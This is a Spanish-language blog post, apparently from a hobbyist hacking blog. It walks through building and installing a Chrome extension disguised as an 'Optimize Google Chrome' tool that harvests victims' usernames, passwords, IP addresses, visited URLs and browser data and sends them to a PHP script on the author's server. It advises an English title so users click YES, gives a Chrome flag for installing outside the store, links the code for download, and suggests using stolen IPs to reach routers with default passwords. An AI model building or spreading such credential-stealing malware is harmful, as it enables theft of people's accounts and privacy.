Al parecer esto se lo debo al dolor de cabeza que tuve ayer por la noche que hizo que me distrajera con alguna idea que se me salia de la imaginación Como hace unas semanas vi un archivo javascript capaz demostrar las contraseñas en forma local (escuchar al servidor) y en el nos arrojaba las contraseñas y el email.
Así que decidí ir por aquella imaginación que era tratar de enviar datos en forma remota:
1.- Primero se me paso por la cabeza que el javascript cree un archivo txt luego enviarlo, pero para crear un archivo txt un depende mucho de si es usuario que navega tiene los permisos suficiente Ademas no es lo mismo crear un txt linux-windows. Pero dije no es una loca idea.
2.-Segundo se me ocurrió enviar los datos via email. Pero como sabemos javascripit no es posible enviar , averigüé un poco mas que si se podía hacer mediante phpmailer pero dije bahh para eso necesito que hsoting tenga SSL ocorriento 443 , eso por que gmail-outlook necesita una conexión segura.
3.-Tercero pensé en enviar por el puerto 21 (FTP)para enviar los datos o sobre escribirlo hice una conexión exitosa, pero como enviaba el archivo. Aunque con php si era posible pero lo que necesitaba era javascript... =(
function ftp_login(form) {
var login = form.login.value;
var pass= form.clave.value;
var sererr = form.servidor.value;
if (login && clave && servidor) {
var ftp_connect = "ftp://" + login + ":" +pass + "@" + server;
window.location = ftp_connect;
}
else {
alert("=(No se conecto");
}
}
4.- Entonces dije si creo un zip el el que se guarde la contraseña y luego pueda enviarlo. Pero aun que sabia no era posible enviármelo al correo pero tal vez al FTP, puede llegar a crear un archivo zip pero con php e incluso podía enviar una imagen , uhmm entonces creí que tal vez podía enviar un screen, pero bueno sera para otra ocasión. Pero aquí esta el link con el cual se puede crear el archivo zip http://stuartk.com/jszip/
5.- Creo que las ideas se me acababan ya era las 3 a.m de la madrugada así que dije uhmmm me recode de XXS y dije EURECAAAAAAAAAAAA....!! Lo tenia...!!
Empecemos...!!
Bueno primero lo primero para crear el crx ( que es la extensión que tienen los complementos de Google Chrome) necesitamos 2 archivos el *.json y *.js (que es el javascript). En el *.json se encuentra la descripción del complemento . En mi caso fue el siguiente: NO SE DEBE CAMBIAR EL NOMBRE" manifest.json"
Link de Descarga : https://github.com/Parada-Geek/Google-pass-user
*.json[/caption]Por que esta en ingles pues cuando instales el complemento la mayoría cuando se encuentra en otro idioma solo le pones YES.. asi que mejor esta ese idioma ademas el titulo es resaltante OPTIMIZAR Google Ghrome "En otras palabras " Obtener tu user y pass ". Luego verán que dice chrome.js ese es el archivo Javascript.
Ahora editamos el chrome.js lo único que necesitas editar por nuestro hosting "localhost" Reemplazan por el suyo.
javascriptel javascripit tiene que estar en tener el tipo de codificacion UTF-8. Luego de ello vamos chrome y *.json y *.js debe encontrarse en una carpeta.
Una vez abierto Chrome se dirigen a Extensiones.
ExtensionCuando nos encontremos ahi das click en el checkbox de Modo Desarrollador y luego Empaquetar Extensión.
Empaquetar ExtensionAhora se dirigen a la carpeta en donde se encuentra el *.json y *.js en mi caso es C:UsersDavzDesktopOptimize Google Chrome esa misma dirección colocamos en el siguiente popup.
Empaquetar[/caption]Luego empaquetara la extensión de google chrome.
Directorio[/caption]Para poder instalar la extensión necesitas agregar
--enable-easy-off-store-extension-install
a las propiedades del acceso de google chrome.
Acceso Directo
Eso seria lo único negativo =( ..!!
Seguimos ahora ya podemos colocar la dirección que nos arrojo el popup en mi caso C:UsersDavzDesktopOptimize Google Chrome.crx el cual colocamos en la barra de dirección.
Añadir
Ahora ya esta el 90 % del trabajo hecho, ahora solo necesitamos subir al hosting el archivo guardar.php acompañado de un archivo datos.txt (datos.txt debe tener los permisos suficientes para ser modificados).
php
ese archivo junto con el datos.txt deben subirlo al host. Si todo resulto bien cuando se ingrese a una pagina los datos serán enviados a http://localhost/datos.txt
Datos
Con la extensión se puede obtener:
- Contraseñas /Usuario
- El lenguaje
- Protocolo por el cual se navega
- El proxy
- Obtenemos el puerto
- El agente (wap o web)-(S.O)-(Navegador aunque ya sabemos que es google Chrome)
- La dirección ala que se accede
- La fecha.
- Y por supuesto la IP pública (podemos acceder a su router si es que la contraseña la tiene por default)
Lo estoy realizando para firefox *.xpi pero en este caso necesito encontrar la API adecuada e introducirlo en el main. Próximamente lo estaré publicando.
Link de Descarga : https://github.com/Parada-Geek/Google-pass-user
El dolor de cabeza que se convirtió en una Extensión para Google Chrome
Un AGRADECIMIENTO Especial a :
<sh4r3m4n>
licenciaparahackear.wordpress.com
shareman1204@gmail.com
Quien aporto con dicha extensión. *.js
No hay comentarios. :
Publicar un comentario